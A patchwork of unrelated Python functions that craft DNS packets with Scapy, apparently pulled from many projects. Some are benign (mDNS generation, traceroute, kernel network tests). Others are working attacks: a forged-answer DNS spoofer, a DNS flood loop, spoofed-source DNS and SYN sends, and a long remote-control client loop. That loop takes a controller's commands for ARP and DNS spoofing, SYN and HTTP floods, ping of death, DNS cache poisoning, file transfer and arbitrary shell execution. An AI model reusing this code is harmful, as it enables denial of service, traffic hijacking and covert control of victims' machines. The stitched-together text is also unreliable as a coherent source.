def dnspunch(self): # punchpkt e = scapy.Ether(dst=self.router_mac) self.msg("sending punchies...") pkt = scapy.IP(src=self.server_ip, dst=self.attacker_ip) pkt /= scapy.UDP(sport=53, dport=53) pkt /= scapy.Raw("udp holepunch test") scapy.sendp(e / pkt, iface=self.interface) # rqpkt self.msg("sending DNS request to %s asking %s..." % (self.server_ip, self.domain)) pkt = scapy.IP(src=self.attacker_ip, dst=self.server_ip) pkt /= scapy.UDP(sport=53, dport=53) pkt /= scapy.DNS(rd=1, qd=scapy.DNSQR(qname=self.domain)) x, u = scapy.srp(e / pkt, timeout=5, iface=self.interface) self.msg('ok') for p in x[0]: p.show() if p[1].proto == 1: print "%s %s/%s" % (p[1].sprintf("%IP.src%"), p[1].sprintf("%ICMP.type%"), p[1].sprintf("%ICMP.code%")) else: p[1].show()
def generate(self, ip_dst=None, eth_dst=None): """Generates a mDNS v4 packet for multicast DNS config Args: ip_dst: IP destination address (Optional) eth_dst: Ethernet (layer 2) destination address (Optional) """ # Overwrite standard fields if desired sta_ip = (ip_dst if ip_dst is not None else MDNS_V4_IP_DST) sta_hw = (eth_dst if eth_dst is not None else MDNS_V4_MAC_DST) # Create mDNS layer qdServer = scapy.DNSQR(qname=self.src_ipv4, qtype=MDNS_QTYPE) mDNS = scapy.DNS(rd=MDNS_RECURSIVE, qd=qdServer) # Create UDP udp = scapy.UDP(sport=MDNS_UDP_PORT, dport=MDNS_UDP_PORT) # Create IP layer ip4 = scapy.IP(src=self.src_ipv4, dst=sta_ip, ttl=255) # Create Ethernet layer ethernet = scapy.Ether(src=self.src_mac, dst=sta_hw) self.packet = ethernet / ip4 / udp / mDNS return self.packet
def dns_request_factory(id_num): packet = network.DNS(id=random.randrange(0, 65536, 1), rd=1, qdcount=1, qd=network.DNSQR(qname=str(id_num) + ".yumi.ipl.eecs.case.edu")) return bytes(packet)
def make_response(transaction_id:str, question_name:bytes, size=3, cname=False) -> network.DNS: if question_name == b"yumi.ipl.eecs.case.edu.": return network.DNS( id=transaction_id, qr=1, aa=1, ra=1, qdcount=1, qd=network.DNSQR(qname=question_name), ancount=1, an=network.DNSRR( rrname=question_name, rdata="129.22.150.112" ) ) if cname: return network.DNS( id=transaction_id, qr=1, aa=1, ra=1, qdcount=1, qd=network.DNSQR(qname=question_name), ancount=1, an=network.DNSRR( rrname=question_name, type=5, #CNAME rdata="cname-"+question_name.decode() ) ) records = ["192.168.0.{}".format(num) for num in range(size)] base_record = network.DNSRR(rrname=question_name, ttl=600, rdata=records[0]) for resource_records in records[1:]: base_record /= network.DNSRR(rrname=question_name, ttl=600, rdata=resource_records) return network.DNS( id=transaction_id, qr=1, aa=1, ra=1, qdcount=1, qd=network.DNSQR(qname=question_name), ancount=len(records), an=base_record )
def setUp(self): """ Setup class for DNS_Amplification. """ # Create scapy packet (valid attack) self.pkt = scapy.IP(src="10.0.2.15", dst="dns.google") \ / scapy.UDP(dport=53) \ / scapy.DNS(rd=1, qd=scapy.DNSQR(qname="google.com", qtype="ANY")) # Create a scapy packet (invalid attack) self.pkt2 = scapy.IP(src="10.0.2.15", dst="0.0.0.0") \ / scapy.UDP(dport=53) \ / scapy.DNS(rd=1, qd=scapy.DNSQR(qname="google.com", qtype="ANY")) # Create DNS Amplification object self.dns_amp_obj = DNS_Amplification()
def traceroute_dns_servers(hosts, fqdn): """ Run UDP traceroutes to the given DNS servers, using FQDN in DNS requests. """ log.info("Running UDP traceroutes to %d servers." % len(hosts)) addrs = [host.addr for host in hosts] udp_datagram = scapy.UDP(sport=scapy.RandShort()) dns_msg = scapy.DNS(qd=scapy.DNSQR(qname=fqdn)) return scapy.traceroute(addrs, l4=udp_datagram / dns_msg, verbose=0)
def handle(packet): global hostfile_dict # Only deal with packets containing DNS records if packet.haslayer(scapy.DNS): # Dissect packet into approriate layers orig_ip = packet.getlayer(scapy.IP) orig_udp = packet.getlayer(scapy.UDP) orig_dns = packet.getlayer(scapy.DNS) # If -h option provided if hostfile_dict: # Check if queried domain part of hostfile if (packet.getlayer(scapy.DNS).qd.qname) not in hostfile_dict.keys(): return spoofed_rdata = hostfile_dict[orig_dns.qd.qname] else: # Spoofed IP of local machine ni.ifaddresses(dev) spoofed_rdata = ni.ifaddresses(dev)[ni.AF_INET][0]['addr'] #qr = 0 for Query and qtype = 1 for A record if orig_dns.qr == 0 and orig_dns.qd.qtype == 1: spoofed_src_ip = orig_ip.dst spoofed_dst_ip = orig_ip.src spoofed_src_port = orig_udp.dport spoofed_dst_port = orig_udp.sport spoofed_id = orig_dns.id spoofed_qr = 1 spoofed_opcode = orig_dns.opcode spoofed_aa = 1 spoofed_rd = orig_dns.rd spoofed_ra = 0 spoofed_z = 0 spoofed_rcode = 0 spoofed_qdcount = 1 spoofed_ancount = 1 spoofed_question = scapy.DNSQR(qname = orig_dns.qd.qname, qtype = orig_dns.qd.qtype, qclass = orig_dns.qd.qclass) spoofed_answer = scapy.DNSRR(rrname = orig_dns.qd.qname, type = orig_dns.qd.qtype, rclass = orig_dns.qd.qclass, ttl = 40960, rdata = spoofed_rdata) # To return multiple IPs #/scapy.DNSRR(rrname = orig_dns.qd.qname, type = orig_dns.qd.qtype, rclass = orig_dns.qd.qclass, ttl = 40960, rdata = spoofed_rdata) spoofed_IP = scapy.IP(src = spoofed_src_ip, dst = spoofed_dst_ip) spoofed_UDP = scapy.UDP(sport = spoofed_src_port, dport = spoofed_dst_port) spoofed_DNS = scapy.DNS(id = spoofed_id, qr = 1, opcode = spoofed_opcode, aa = 1, rd = spoofed_rd, ra = 0, z = 0, rcode = 0, qdcount = spoofed_qdcount, ancount = spoofed_ancount, qd = spoofed_question, an = spoofed_answer) # Sendp sends from layer 2 scapy.sendp(scapy.Ether()/spoofed_IP/spoofed_UDP/spoofed_DNS, iface = dev )
def DNS_Flood(): clear = os.system('clear') #s = scapy.RandString(scapy.RandNum(1,10)) #s1 ='www' #print(s1) #a = scapy.RandNum(1,10) #print(a) #s2 = scapy.RandString(scapy.RandNum(1,5)) #s2 = s2.lower() #s2 = str(s2) #s2 = s2[2:-1] #print(s2) #process_id =process_id #s3 = 'com' #s = s1+'.'+s2+'.'+s3 #print("Please input target's IP:") #target = input("[DNS_Flood]#") #target = "172.16.4.80" #src_ip = scapy.RandIP() #print(s) num = 0 try: while True: packet = scapy.IP(dst="172.16.4.80") / scapy.UDP( sport=scapy.RandShort(), dport=53) / scapy.DNS( rd=1, qd=scapy.DNSQR(qname="www.flood.com")) #packets = scapy.IP(src=src_ip,dst=target)/scapy.UDP(sport=scapy.RandShort(),dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.flood.com")) #packet =scapy.IP(src=src_ip,dst=target)/scapy.TCP(dport=80,flags="S") #scapy.srflood(packet) scapy.send(packet, count=2000, verbose=False) #scapy.send(packets,verbose=False) num += 1 #if num == 1000: #print("%s,%s"%(name,num)) print(num) except KeyboardInterrupt: print("[-] Ctrl + C detected.....")
IPV4_PING = "\x08\x00\x00\x00\x0a\xce\x00\x03" IPV6_PING = "\x80\x00\x00\x00\x0a\xce\x00\x03" IPV4_ADDR = "8.8.8.8" IPV6_ADDR = "2001:4860:4860::8888" IPV6_SEQ_DGRAM_HEADER = (" sl " "local_address " "remote_address " "st tx_queue rx_queue tr tm->when retrnsmt" " uid timeout inode ref pointer drops\n") # Arbitrary packet payload. UDP_PAYLOAD = str(scapy.DNS(rd=1, id=random.randint(0, 65535), qd=scapy.DNSQR(qname="wWW.GoOGle.CoM", qtype="AAAA"))) # Unix group to use if we want to open sockets as non-root. AID_INET = 3003 def LinuxVersion(): # Example: "3.4.67-00753-gb7a556f". # Get the part before the dash. version = os.uname()[2].split("-")[0] # Convert it into a tuple such as (3, 4, 67). That allows comparing versions # using < and >, since tuples are compared lexicographically. version = tuple(int(i) for i in version.split(".")) return version
def pkt(self): return scapy.IP(dst=self.dst) / scapy.UDP( sport=self.sport) / scapy.DNS(rd=1, qd=scapy.DNSQR(qname=self.qname))
def make_DNS_request(ip_address: str) -> network.DNS: request_id = hex(ip_2_int(ip_address)) question_name = "jumbo-" + request_id + QUESTION_ZONE return network.DNS(rd=1, qdcount=1, qd=network.DNSQR(qname=question_name))
def run(self): while True: while not self.connected.value: self.reconnect() while True: try: command = self.reliable_receive() if command[0] == "arpspoof": try: kill_arp() except: pass try: scan_result = network_scanner() if scan_result: global selected global arp_process selected = scan_result arp_process = multiprocessing.Process( target=arp_spoof, args=(selected, router_ip)) arp_process.start() except: pass elif command[0] == 'dnsspoof': try: kill_dns() except: pass try: if arp_process and arp_process.is_alive(): try: kill_hook() except: pass target_website = command[1] modified_ip = command[2] global dns_process dns_process = multiprocessing.Process( target=dns_spoof, args=(target_website, modified_ip)) dns_process.start() except: pass elif command[0] == 'hook': try: kill_hook() except: pass try: if arp_process and arp_process.is_alive(): try: kill_dns() except: pass global hook_process hook_process = multiprocessing.Process( target=hook) hook_process.start() except NameError: pass elif command[0] == "synflood": try: flood_ip = command[1] flood_ports = list( map( int, command[2].translate( {ord(i): None for i in '[]'}).split(','))) flood_time = int(command[3]) pool = multiprocessing.Pool( processes=len(flood_ports)) pool.map( partial(syn_flooding, flood_ip=flood_ip, flood_time=flood_time), flood_ports) pool.close() pool.join() except: pass elif command[0] == "httpflood": try: flood_ip = command[1] flood_time = int(command[2]) http_flooding(flood_ip, flood_time) except: pass elif command[0] == "pod": try: flood_ip = command[1] flood_time = int(command[2]) ping_of_death(flood_ip, flood_time) except: pass elif command[0] == "dnscachepoison": try: spoofDomain = command[1] ns = command[2] nsAddr = command[3] dnsAddr = command[4] query = command[5] dnsPorts = list( map( int, command[6].translate( {ord(i): None for i in '[]'}).split(','))) start = int(command[7]) end = int(command[8]) if end > 65535: end = 65535 dnsQids = list(range(start, end + 1)) badAddr = "10.0.2.10" ip = scapy.IP(src=nsAddr, dst=dnsAddr) qdsec = scapy.DNSQR(qname=query, qtype="A", qclass="IN") ansec = scapy.DNSRR(rrname=ns, type="A", rclass="IN", ttl=60000, rdata=badAddr) nssec = scapy.DNSRR(rrname=spoofDomain, type="NS", rclass="IN", ttl=60000, rdata=ns) p_processes = [] manager = multiprocessing.Manager() total_responses = manager.list() for port in dnsPorts: p = multiprocessing.Process( target=fake_dns_responses, args=(port, dnsQids, qdsec, ansec, nssec, ip, total_responses)) p.start() p_processes.append(p) for process in p_processes: process.join() rawsock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) rawsock.setsockopt(socket.IPPROTO_IP, socket.SO_REUSEADDR, 1) ip = scapy.IP(src=randomize_ip(), dst=dnsAddr) qdsec = scapy.DNSQR(qname=query, qtype="A", qclass="IN") dns = scapy.DNS(id=randomize_integer(), qr=0, opcode="QUERY", rd=1, qdcount=1, ancount=0, nscount=0, arcount=0, qd=qdsec) sending_requests = multiprocessing.Process( target=send_dns_requests, args=(dnsPorts, ip, dns, dnsAddr, rawsock)) sending_fake_responses_processes = [] for port_responses in total_responses: port = port_responses[0] p = multiprocessing.Process( target=send_dns_responses_pool, args=(port, port_responses[1], dnsAddr, rawsock)) sending_fake_responses_processes.append(p) sending_requests.start() for process in sending_fake_responses_processes: process.start() sending_requests.join() for process in sending_fake_responses_processes: process.join() except: pass elif command[0] == "killarp": try: kill_arp() except: pass elif command[0] == "killdns": try: kill_dns() except: pass elif command[0] == "killhook": try: kill_hook() except: pass else: try: if command[0] == "exit": pass elif command[0] == "killconnection": self.connected.value = False break elif command[0] == "PING": command_result = "PONG" elif command[0] == "cd" and len(command) > 1: command_result = change_working_directory_to( command[1]) elif command[0] == "download": command_result = read_file(command[1]) elif command[0] == "upload": command_result = write_file( command[1], command[2]) else: command_result = execute_system_command( command) except: command_result = "[-] Error during command execution." self.reliable_send(command_result) except OSError: self.connected.value = False break
elif command == 'requestdns': my_ip = '10.0.2.10' my_domain = input("Insert domain name: ") my_port = 5533 dns_ip = input("Insert IP: ") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((my_ip, my_port)) rawsock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) rawsock.setsockopt(socket.IPPROTO_IP, socket.SO_REUSEADDR, 1) ip = scapy.IP(src=my_ip, dst=dns_ip) qdsec = scapy.DNSQR(qname=my_domain, qtype="A", qclass="IN") dns = scapy.DNS(qr=0, opcode="QUERY", rd=1, qdcount=1, ancount=0, nscount=0, arcount=0, qd=qdsec) p = multiprocessing.Pool(8) print("Sending requests...") open_dns_ports = p.map(scan_dns, list(range(1, 65535 + 1))) p.close() p.join() open_dns_ports = [port for port in open_dns_ports if port is not None]
import argparse import scapy.all as scapy parser = argparse.ArgumentParser(description='MIE-SIB second homework. Use Scapy to send a TCP/SYN packet with a spoofed sender IP address and a DNS query with a spoofed sender IP address. The scrit only work\'s in a class C network (/24)') parser.add_argument('target', help='The IP address of the target') parser.add_argument('dns_server', help='The IP address of the DNS server') args = parser.parse_args() #Send UDP packet scapy.send(scapy.IP(src=args.target, dst=args.dns_server)/scapy.UDP(dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.thepacketgeek.com")),verbose=0) #Send TCP packet scapy.send(scapy.IP(src=scapy.Rand(args.target +"/24"), dst=args.target)/scapy.TCP(dport=3333, sport=4444, seq=12, flags="S"))